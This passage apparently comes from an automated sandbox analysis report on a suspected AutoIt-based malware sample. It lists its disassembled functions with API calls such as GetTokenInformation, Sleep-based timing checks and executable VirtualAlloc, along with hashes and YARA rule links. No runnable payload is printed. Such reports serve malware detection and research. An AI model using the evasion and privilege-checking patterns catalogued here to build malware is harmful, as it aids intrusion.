                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 842720411-0
                                                    • Opcode ID: dc053004b39c66721cd09c294724b3ce4688f8483742d9fd87cfcb9b271bb48b
                                                    • Instruction ID: 1f7b01d7d9e4893ae4b0511f08e151fcc5202f250df1bbfc594c74a6b2e392f2
                                                    • Opcode Fuzzy Hash: dc053004b39c66721cd09c294724b3ce4688f8483742d9fd87cfcb9b271bb48b
                                                    • Instruction Fuzzy Hash: 6F014B79200204FFDB105FB5EC88CAB7FACEB86395720053AF849C2260CA319C44CA74
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004254E6, Relevance: 7.6, APIs: 5, Instructions: 51sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • QueryPerformanceCounter.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00425502
                                                    • QueryPerformanceFrequency.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00425510
                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00425518
                                                    • QueryPerformanceCounter.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00425522
                                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0042555E
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                    • String ID:
                                                    • API String ID: 2833360925-0
                                                    • Opcode ID: 7ef0b39070b9e243d3900aee7dfeb8cf3c369b1f9314846133fe45eb99129d70
                                                    • Instruction ID: 9b4acbc99dbab651165b8ff76088596d94a3c9c3b7ae02d66a3dc391b0ea2112
                                                    • Opcode Fuzzy Hash: 7ef0b39070b9e243d3900aee7dfeb8cf3c369b1f9314846133fe45eb99129d70
                                                    • Instruction Fuzzy Hash: C9015E36E01929EBCF00ABE5FC489EEBB78FB0A751F400066E405B2144DB355594C76A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004185F1, Relevance: 7.5, APIs: 5, Instructions: 47memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTokenInformation.ADVAPI32(00000000,00000002,00000000,00000000,?,00000000,00000000,00000000,?,00418D7D,00000000,?,?,00000000,00000000), ref: 00418608
                                                    • GetLastError.KERNEL32(?,00418D7D,00000000,?,?,00000000,00000000,?,?,?,00418977,?,?), ref: 00418612
                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00418D7D,00000000,?,?,00000000,00000000,?,?,?,00418977,?,?), ref: 00418621
                                                    • HeapAlloc.KERNEL32(00000000,?,00418D7D,00000000,?,?,00000000,00000000,?,?,?,00418977,?,?), ref: 00418628
                                                    • GetTokenInformation.ADVAPI32(00000000,00000002,00000000,?,?,?,00418D7D,00000000,?,?,00000000,00000000,?,?,?,00418977), ref: 0041863E
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 44706859-0
                                                    • Opcode ID: b5a6a173cb6f8acf6f6ef1ca064a9d14bec809ed4d52a7f709852e207f74aa93
                                                    • Instruction ID: aaf5e1930002ad747d40cb98f4cd045ccaf57341e2df90ae360d8f8400460448
                                                    • Opcode Fuzzy Hash: b5a6a173cb6f8acf6f6ef1ca064a9d14bec809ed4d52a7f709852e207f74aa93
                                                    • Instruction Fuzzy Hash: 65F04F75241204BFEB200FA5EC8DEAB3FACEF86755B40453AF445D6150CA255C45CA78
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00418652, Relevance: 7.5, APIs: 5, Instructions: 47memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,00000000,?,?,00000000,?,00418BC7,00000000,00000000,00000000), ref: 00418669
                                                    • GetLastError.KERNEL32(?,?,00000000,?,00418BC7,00000000,00000000,00000000), ref: 00418673
                                                    • GetProcessHeap.KERNEL32(00000008,00000000,?,?,00000000,?,00418BC7,00000000,00000000,00000000), ref: 00418682
                                                    • HeapAlloc.KERNEL32(00000000,?,?,00000000,?,00418BC7,00000000,00000000,00000000), ref: 00418689
                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,00000000,00000000,?,?,00000000,?,00418BC7,00000000,00000000,00000000), ref: 0041869F
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                    • String ID:
                                                    • API String ID: 44706859-0
                                                    • Opcode ID: 1f5315ac0bb294c872a05009acc523af1921f69f6559729c080259344d191cff
                                                    • Instruction ID: 174cbcf52dc33057f7284e4c8dce90f6b99a8024995d9109c99ec6977db46663
                                                    • Opcode Fuzzy Hash: 1f5315ac0bb294c872a05009acc523af1921f69f6559729c080259344d191cff
                                                    • Instruction Fuzzy Hash: 30F0C275200204BFEB211FA9EC88EBB3FACFF86754B00013AF448C2150CB218954CA38
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041C6A6, Relevance: 7.5, APIs: 5, Instructions: 43windowtimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                    • String ID:
                                                    • API String ID: 3741023627-0
                                                    • Opcode ID: 2afe406052f7497f49198dd55e8e2d9c1239825e6d12a0b0f59b004ac193da47
                                                    • Instruction ID: 5bc45344a93d436e76bca392f186b32cd2ebb2a0d9242e83a79ac129c9766402
                                                    • Opcode Fuzzy Hash: 2afe406052f7497f49198dd55e8e2d9c1239825e6d12a0b0f59b004ac193da47
                                                    • Instruction Fuzzy Hash: B101D634540304ABEB215B60ED8EFE77B78FF02746F00056AF156A04E0DBF569998F58
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C13B0, Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • EndPath.GDI32(?), ref: 003C13BF
                                                    • StrokeAndFillPath.GDI32(?,?,003FBAD8,00000000,?), ref: 003C13DB
                                                    • SelectObject.GDI32(?,00000000), ref: 003C13EE
                                                    • DeleteObject.GDI32 ref: 003C1401
                                                    • StrokePath.GDI32(?), ref: 003C141C
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                    • String ID:
                                                    • API String ID: 2625713937-0
                                                    • Opcode ID: 7b1bc675866767fad31362077faca09945b4e0524152a8fa21092a0b5efad4cd
                                                    • Instruction ID: 774e583c939b6c89e7c89523a1f053e839d594d82b99d05e31925ad89edbbebe
                                                    • Opcode Fuzzy Hash: 7b1bc675866767fad31362077faca09945b4e0524152a8fa21092a0b5efad4cd
                                                    • Instruction Fuzzy Hash: AFF0CD34001248EBDB666F56EC0CB583FA4AB42366F158A39E429844F2D7324995DF58
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043E33E, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 307memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CharLowerBuffW.USER32(?,?), ref: 0043E3D2
                                                    • CharLowerBuffW.USER32(?,?), ref: 0043E415
                                                      • Part of subcall function 0043DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0043DAD9
                                                    • VirtualAlloc.KERNEL32(00000000,UT]]H,00003000,00000040), ref: 0043E615
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: BuffCharLower$AllocVirtual
                                                    • String ID: UT]]H
                                                    • API String ID: 3213863441-3063877160
                                                    • Opcode ID: 80f8c7a8374459266b4d76d1705de75570fe78b0551f3e9ee37b6bff65075159
                                                    • Instruction ID: c00191987ce055ce4ea4e5b0605133fafcfd2b875836307ced00bd807539d588
                                                    • Opcode Fuzzy Hash: 80f8c7a8374459266b4d76d1705de75570fe78b0551f3e9ee37b6bff65075159
                                                    • Instruction Fuzzy Hash: E6C176716083119FC705DF29C480A6ABBE4FF88718F14896EF8999B391D734ED46CB86
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042BBA6, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 003C48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003C48A1,?,?,003C37C0,?,00000000,00000001), ref: 003C48CE
                                                    • CoInitialize.OLE32(00000000), ref: 0042BC26
                                                    • CoCreateInstance.OLE32(00452D6C,00000000,00000001,00452BDC,?), ref: 0042BC3F
                                                    • CoUninitialize.OLE32 ref: 0042BC5C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize
                                                    • String ID: .lnk
                                                    • API String ID: 3769357847-24824748
                                                    • Opcode ID: 29635d781ddb806873d756fa5471ed4fe90ae55afbbdf098272f557231f18972
                                                    • Instruction ID: 9f5c0bde8110a2a1cc6979febc5e9a17e6c3037530ed28f65eb98081d51b6bcc
                                                    • Opcode Fuzzy Hash: 29635d781ddb806873d756fa5471ed4fe90ae55afbbdf098272f557231f18972
                                                    • Instruction Fuzzy Hash: 0CA141752042119FCB01EF14C884E6ABBE5FF88314F15899EF8999B3A2CB35ED45CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041B7B6, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 251comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • OleSetContainedObject.OLE32(0000000C,00000001), ref: 0041B981
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ContainedObject
                                                    • String ID: AutoIt3GUI$Container$%E
                                                    • API String ID: 3565006973-4107763017
                                                    • Opcode ID: 4b3e28f37fa26ecac71ec361d0ea7ea51287a70bbabd9eff5dbb0212c920893f
                                                    • Instruction ID: 7f7c9d6e3ffd5a4d41e5e2118b9eb9e88712bd4dcef7027e3c468bed7c7f37e6
                                                    • Opcode Fuzzy Hash: 4b3e28f37fa26ecac71ec361d0ea7ea51287a70bbabd9eff5dbb0212c920893f
                                                    • Instruction Fuzzy Hash: 7F914D71610201AFDB14DF64C885AA7BBF8FF49710F20856EF949CB291DB75E881CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00417A78, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 236COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000), ref: 00417C32
                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,?,00000000), ref: 00417C4A
                                                    • CLSIDFromProgID.OLE32(?,?,00000000,0044FB80,000000FF,?,?,00000000), ref: 00417C6F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: FromProg$FreeTask
                                                    • String ID: ,,E
                                                    • API String ID: 3873279438-4052858919
                                                    • Opcode ID: bedc14f1928216ad45debf16ed415ef5e21af7422edadb3a355fbbc6dd191da6
                                                    • Instruction ID: f48a6b32d8e6fc896e298f0e10b2c2198cfc0b07b9cecdb04ac8267f1798e265
                                                    • Opcode Fuzzy Hash: bedc14f1928216ad45debf16ed415ef5e21af7422edadb3a355fbbc6dd191da6
                                                    • Instruction Fuzzy Hash: 30811972A04109EFCB04DF94C988DEEB7B9FF89315F204199F506AB250DB75AE46CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00422F86, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 201windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetMenuItemInfoW.USER32(?,?,?,?), ref: 004230A6
                                                    • SetMenuItemInfoW.USER32 ref: 00423159
                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00423187
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ItemMenu$Info$Default
                                                    • String ID: 0
                                                    • API String ID: 1306138088-4108050209
                                                    • Opcode ID: 74b86a681a5ebdc566d1b90d63aeceb2fc14d1ccb0057a28fb1a0cba20bc040d
                                                    • Instruction ID: 527b35f0b794cd8f59b2f977387b242d661db4889c9ef72d9ff73fbd6a26d047
                                                    • Opcode Fuzzy Hash: 74b86a681a5ebdc566d1b90d63aeceb2fc14d1ccb0057a28fb1a0cba20bc040d
                                                    • Instruction Fuzzy Hash: C5510431608320AAD715AF24E844A7B7BF4EF45321F440A2FF881D22D1DB7CCE54876A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00422C42, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 119windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00422CCB
                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 00422D11
                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00486890,00000000), ref: 00422D5A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Menu$Delete$InfoItem
                                                    • String ID: 0
                                                    • API String ID: 135850232-4108050209
                                                    • Opcode ID: 29ce1aa7980ab6ea33e72ccdc4c9a4b46aa7f6ed33f9d6c96fa524a25e192f29
                                                    • Instruction ID: 279e7887c3572e7c5d479318c7dcb8aa40c9cb90566e9380734fc529004d9186
                                                    • Opcode Fuzzy Hash: 29ce1aa7980ab6ea33e72ccdc4c9a4b46aa7f6ed33f9d6c96fa524a25e192f29
                                                    • Instruction Fuzzy Hash: E241CE31204312BFD720DF24E944F57BBA8EF85324F10462EF961972A1D7B4E905CBA6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004238AD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115filestringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 004248AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,004253E8,?), ref: 004248C7
                                                      • Part of subcall function 004248AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,004253E8,?), ref: 004248E0
                                                    • lstrcmpiW.KERNEL32(?,?,?,?,?,0042A7D7,00000000), ref: 004238F3
                                                    • MoveFileW.KERNEL32(?,?), ref: 00423927
                                                    • SHFileOperationW.SHELL32(?), ref: 004239DB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: FileFullNamePath$MoveOperationlstrcmpi
                                                    • String ID: \*.*
                                                    • API String ID: 67141772-1173974218
                                                    • Opcode ID: 3a8647b4ba4b052e34a8f20f31b7d79727d580e501647124e6217f0507e1d33e
                                                    • Instruction ID: b0976e4ddaded145abc340d9dec3dfdfab78172df6a679ce07ec4993aaba718b
                                                    • Opcode Fuzzy Hash: 3a8647b4ba4b052e34a8f20f31b7d79727d580e501647124e6217f0507e1d33e
                                                    • Instruction Fuzzy Hash: ED41A3B22083949AC752EF65E4419EBB7ECEF86341F40092FF085C7151EA79D288C716
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00447BB5, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0044F910,00000000,?,?,?,?), ref: 00447C4E
                                                    • GetWindowLongW.USER32 ref: 00447C6B
                                                    • SetWindowLongW.USER32 ref: 00447C7B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Window$Long
                                                    • String ID: SysTreeView32
                                                    • API String ID: 847901565-1698111956
                                                    • Opcode ID: a8fc41af43921b88e43b338819339db72f0cefcefd6236c514ff0132de008a75
                                                    • Instruction ID: 9a97d52954ea64f08284ba3cac2371b8e5bdf578b0ad7df038588386efb3ee3a
                                                    • Opcode Fuzzy Hash: a8fc41af43921b88e43b338819339db72f0cefcefd6236c514ff0132de008a75
                                                    • Instruction Fuzzy Hash: B931B035204205AEEB119F34DC45BEB77A8EB05328F21872AF875E22E0C735A8569B64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00447648, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 004476D0
                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 004476E4
                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00447708
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: MessageSend$Window
                                                    • String ID: SysMonthCal32
                                                    • API String ID: 2326795674-1439706946
                                                    • Opcode ID: 34d260a80d784516541f7f59a063930000f29a057b282580bd5e5b8955109441
                                                    • Instruction ID: c38c1aef03c00f446d91b2aa806800d4285b89c730d66bc985034f68711a41f3
                                                    • Opcode Fuzzy Hash: 34d260a80d784516541f7f59a063930000f29a057b282580bd5e5b8955109441
                                                    • Instruction Fuzzy Hash: 0421D132600218BFEF158FA4CC46FEB3B79EF49764F110215FA156B1D0CBB5A8518BA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00447E02, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00447EB9
                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00447EC7
                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00447ECE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: MessageSend$DestroyWindow
                                                    • String ID: msctls_updown32
                                                    • API String ID: 4014797782-2298589950
                                                    • Opcode ID: dab1f232757e4c889f70a9f32ecbe23c78bc210dff57e63306e2eabc4c708c98
                                                    • Instruction ID: 21b1692d7d02d2d5734d1764eb6435601b5eef8ceef2be61f21e1a00f7a247c2
                                                    • Opcode Fuzzy Hash: dab1f232757e4c889f70a9f32ecbe23c78bc210dff57e63306e2eabc4c708c98
                                                    • Instruction Fuzzy Hash: 982192B5604109AFEB01DF14CC81DBB37ECEF5A394B15095AF5049B361CB35EC128B64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00446F1F, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00446FAA
                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00446FBA
                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00446FDF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: MessageSend$MoveWindow
                                                    • String ID: Listbox
                                                    • API String ID: 3315199576-2633736733
                                                    • Opcode ID: 1c9abbcd5e9dd9086f0d73b52327c00f2bcec3bd6ef773bd2eb9a209c5b370c9
                                                    • Instruction ID: e4df0f6647173bf1609e135f241d959ec1101c3d19d28d2311ff41673a58c1db
                                                    • Opcode Fuzzy Hash: 1c9abbcd5e9dd9086f0d73b52327c00f2bcec3bd6ef773bd2eb9a209c5b370c9
                                                    • Instruction Fuzzy Hash: E521C232610118BFEF118F54DC85FBF3B6AEF8A764F028125F9449B190C6759C56CBA8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041A52F, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0041A37C: SendMessageTimeoutW.USER32 ref: 0041A399
                                                      • Part of subcall function 0041A37C: GetWindowThreadProcessId.USER32(?,?), ref: 0041A3AC
                                                      • Part of subcall function 0041A37C: GetCurrentThreadId.KERNEL32 ref: 0041A3B3
